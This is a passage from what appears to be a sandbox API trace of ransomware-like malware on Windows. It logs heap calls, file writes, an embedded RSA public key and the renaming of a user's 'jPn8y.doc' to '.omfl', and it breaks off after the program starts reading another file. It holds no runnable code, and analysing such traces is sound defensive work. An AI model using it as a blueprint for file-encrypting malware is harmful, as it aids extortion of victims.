returned 0xdd16968 [0131.856] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa860 | out: hHeap=0x4970000) returned 1 [0131.856] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd172c8 [0131.856] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd171d8 | out: hHeap=0x4970000) returned 1 [0131.856] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd171d8 [0131.856] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16968 | out: hHeap=0x4970000) returned 1 [0131.856] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0xdcfa860 [0131.856] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0131.856] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cf128 [0131.856] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa860 | out: hHeap=0x4970000) returned 1 [0131.856] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1c) returned 0xdce8f58 [0131.856] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17298 | out: hHeap=0x4970000) returned 1 [0131.856] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd17298 [0131.856] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0131.856] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x204) returned 0xdd206b0 [0131.856] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17178 | out: hHeap=0x4970000) returned 1 [0131.856] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x108) returned 0x75039b8 [0131.856] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd171d8 | out: hHeap=0x4970000) returned 1 [0131.857] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x210) returned 0xdce0a50 [0131.857] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8f58 | out: hHeap=0x4970000) returned 1 [0131.857] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10c) returned 0x74e3210 [0131.857] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8a0 | out: hHeap=0x4970000) returned 1 [0131.857] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x108) returned 0x7503788 [0131.857] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17298 | out: hHeap=0x4970000) returned 1 [0131.857] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x200) returned 0xdd06f38 [0131.857] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x75039b8 | out: hHeap=0x4970000) returned 1 [0131.857] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24890 [0131.857] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0131.857] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d1c58 | out: hHeap=0x4970000) returned 1 [0131.857] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24260 | out: hHeap=0x4970000) returned 1 [0131.857] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24890 | out: hHeap=0x4970000) returned 1 [0131.857] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf128 | out: hHeap=0x4970000) returned 1 [0131.857] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7503788 | out: hHeap=0x4970000) returned 1 [0131.857] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce0a50 | out: hHeap=0x4970000) returned 1 [0131.857] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd06f38 | out: hHeap=0x4970000) returned 1 [0131.858] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0131.858] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8b0 | out: hHeap=0x4970000) returned 1 [0131.858] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd172c8 | out: hHeap=0x4970000) returned 1 [0131.858] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8e0 | out: hHeap=0x4970000) returned 1 [0131.858] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17208 | out: hHeap=0x4970000) returned 1 [0131.858] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf168 | out: hHeap=0x4970000) returned 1 [0131.858] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd172b0 | out: hHeap=0x4970000) returned 1 [0131.858] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17280 | out: hHeap=0x4970000) returned 1 [0131.858] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17560 | out: hHeap=0x4970000) returned 1 [0131.858] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750ca48 | out: hHeap=0x4970000) returned 1 [0131.858] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24680 | out: hHeap=0x4970000) returned 1 [0131.858] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17268 | out: hHeap=0x4970000) returned 1 [0131.858] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd35310 | out: hHeap=0x4970000) returned 1 [0131.858] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd206b0 | out: hHeap=0x4970000) returned 1 [0131.858] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24368 | out: hHeap=0x4970000) returned 1 [0131.858] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c4e0 | out: hHeap=0x4970000) returned 1 [0131.858] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7503670 | out: hHeap=0x4970000) returned 1 [0131.858] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdf28 | out: hHeap=0x4970000) returned 1 [0131.858] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0131.858] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdbc8 | out: hHeap=0x4970000) returned 1 [0131.858] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08de8 | out: hHeap=0x4970000) returned 1 [0131.858] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e4b90 | out: hHeap=0x4970000) returned 1 [0131.858] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb28 | out: hHeap=0x4970000) returned 1 [0131.858] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0131.858] WriteFile (in: hFile=0x610, lpBuffer=0xdd35410*, nNumberOfBytesToWrite=0x6c40, lpNumberOfBytesWritten=0xe00fb14, lpOverlapped=0x0 | out: lpBuffer=0xdd35410*, lpNumberOfBytesWritten=0xe00fb14*=0x6c40, lpOverlapped=0x0) returned 1 [0131.859] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd35410 | out: hHeap=0x4970000) returned 1 [0131.859] SetFilePointerEx (in: hFile=0x610, liDistanceToMove=0x6c45, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.859] WriteFile (in: hFile=0x610, lpBuffer=0xdd24578*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24578*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0131.859] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24578 | out: hHeap=0x4970000) returned 1 [0131.859] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5dc0 [0131.859] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x428) returned 0xdd19550 [0131.859] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", cchWideChar=-1, lpMultiByteStr=0xdd19550, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", lpUsedDefaultChar=0x0) returned 41 [0131.859] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x430) returned 0xdce69c8 [0131.859] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd19550 | out: hHeap=0x4970000) returned 1 [0131.859] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5dc0 | out: hHeap=0x4970000) returned 1 [0131.859] WriteFile (in: hFile=0x610, lpBuffer=0xdce69c8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdce69c8*, lpNumberOfBytesWritten=0xe00fb50*=0x28, lpOverlapped=0x0) returned 1 [0131.859] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce69c8 | out: hHeap=0x4970000) returned 1 [0131.859] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0131.859] WriteFile (in: hFile=0x610, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0131.860] CloseHandle (hObject=0x610) returned 1 [0131.864] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d1c58 [0131.864] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x890) returned 0x74fb288 [0131.864] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d1c58 | out: hHeap=0x4970000) returned 1 [0131.865] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_BvYf_mP_z7pO60\\jPn8y.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_bvyf_mp_z7po60\\jpn8y.doc"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_BvYf_mP_z7pO60\\jPn8y.doc.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_bvyf_mp_z7po60\\jpn8y.doc.omfl")) returned 1 [0131.876] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb288 | out: hHeap=0x4970000) returned 1 [0131.876] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0131.877] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.878] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74bf8f0 | out: hHeap=0x4970000) returned 1 [0131.878] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51fa580, ftCreationTime.dwHighDateTime=0x1d5da95, ftLastAccessTime.dwLowDateTime=0x91afb2b0, ftLastAccessTime.dwHighDateTime=0x1d5e03f, ftLastWriteTime.dwLowDateTime=0x91afb2b0, ftLastWriteTime.dwHighDateTime=0x1d5e03f, nFileSizeHigh=0x0, nFileSizeLow=0x18f43, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kS 3v1.png", cAlternateFileName="KS3V1~1.PNG")) returned 1 [0131.878] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0x74d2e60 [0131.878] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xa6) returned 0x74bf8f0 [0131.878] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74d2e60 | out: hHeap=0x4970000) returned 1 [0131.878] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_BvYf_mP_z7pO60\\kS 3v1.png") returned=".png" [0131.878] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_BvYf_mP_z7pO60\\kS 3v1.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_bvyf_mp_z7po60\\ks 3v1.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0131.879] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=102211) returned 1 [0131.879] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0131.882] SetFilePointerEx (in: hFile=0x610, liDistanceToMove=0x18f1d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.882] ReadFile (in: hFile=0x610, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0131.883] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0131.883] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0131.883] SetFilePointer (in: hFile=0x610, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.883] ReadFile (in: hFile=0x610, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0x18f43, lpOverlapped=0x0) returned 1 [0131.884] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.884] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1ef) returned 0xdd0bd00 [0131.884] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.884] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.884] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d1c58) returned 1 [0131.885] CryptCreateHash (in: hProv=0x49d1c58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0131.885] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0131.885] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0131.885] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0131.885] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0131.885] GetLastError () returned 0x0 [0131.886] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0131.886] CryptReleaseContext (hProv=0x49d1c58, dwFlags=0x0) returned 1 [0131.886] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0131.886] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0131.886] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0131.886] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb28 [0131.886] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0131.886] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0131.886] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0131.886] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18f40) returned 0xdd35410 [0131.887] SetFilePointer (in: hFile=0x610, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0131.887] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb28 | out: hHeap=0x4970000) returned 1 [0131.887] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0xdd0bd00 [0131.887] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb28 [0131.887] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0x74e4b90 [0131.887] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08de8 [0131.887] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdd35310 [0131.887] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17268 [0131.887] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdd35358 [0131.887] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17280 [0131.887] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd172b0 [0131.887] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17208 [0131.887] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd172c8 [0131.887] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x24) returned 0xdd0d930 [0131.887] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x158) returned 0xdd27968 [0131.887] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdd27968, Size=0x218) returned 0xdd206b0 [0131.887] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x558) returned 0xdce69c8 [0131.887] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd172b0 | out: hHeap=0x4970000) returned 1 [0131.887] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd172c8 | out: hHeap=0x4970000) returned 1 [0131.887] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17208 | out: hHeap=0x4970000) returned 1 [0131.887] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0d930 | out: hHeap=0x4970000) returned 1 [0131.887] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce69c8 | out: hHeap=0x4970000) returned 1 [0131.887] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17208 [0131.888] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e78 [0131.888] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd172c8 [0131.888] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cdbc8 [0131.888] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x9) returned 0xdd172b0 [0131.888] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e38 [0131.888] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10e) returned 0x74e3210 [0131.888] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8f58 [0131.888] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08ea8 [0131.888] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cdf28 [0131.888] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x104) returned 0x7503670 [0131.888] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cf168 [0131.888] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e58 [0131.888] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0131.888] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd172c8 | out: hHeap=0x4970000) returned 1 [0131.888] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0131.888] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd172b0 | out: hHeap=0x4970000) returned 1 [0131.888] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdbc8 | out: hHeap=0x4970000) returned 1 [0131.888] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0131.888] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17208 | out: hHeap=0x4970000) returned 1 [0131.888] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8f58 | out: hHeap=0x4970000) returned 1 [0131.888] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08de8 | out: hHeap=0x4970000) returned 1 [0131.888] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd206b0 | out: hHeap=0x4970000) returned 1 [0131.888] GetCurrentThreadId () returned 0x618 [0131.888] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24578 [0131.888] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x82) returned 0xdd2e230 [0131.888] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x2c) returned 0x750ca48 [0131.889] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d1c58 [0131.889] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x148) returned 0xdd17560 [0131.889] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e78 [0131.889] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e38 [0131.889] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24368 [0131.889] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0131.889] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0131.889] GetCurrentThreadId () returned 0x618 [0131.889] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0131.889] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0131.889] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xeb) returned 0x74e3210 [0131.889] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0131.889] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0131.889] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0131.889] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0131.889] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0131.889] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24680 [0131.889] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0131.889] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4c) returned 0x757c4e0 [0131.889] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e78 [0131.889] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24890 [0131.889] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0131.889] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17208 [0131.889] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0131.889] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0131.889] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e18 [0131.889] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8e0 [0131.889] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8b0 [0131.890] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8a0 [0131.890] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa860 [0131.890] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8c0 [0131.890] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd172b0 [0131.890] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e18 | out: hHeap=0x4970000) returned 1 [0131.890] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e18 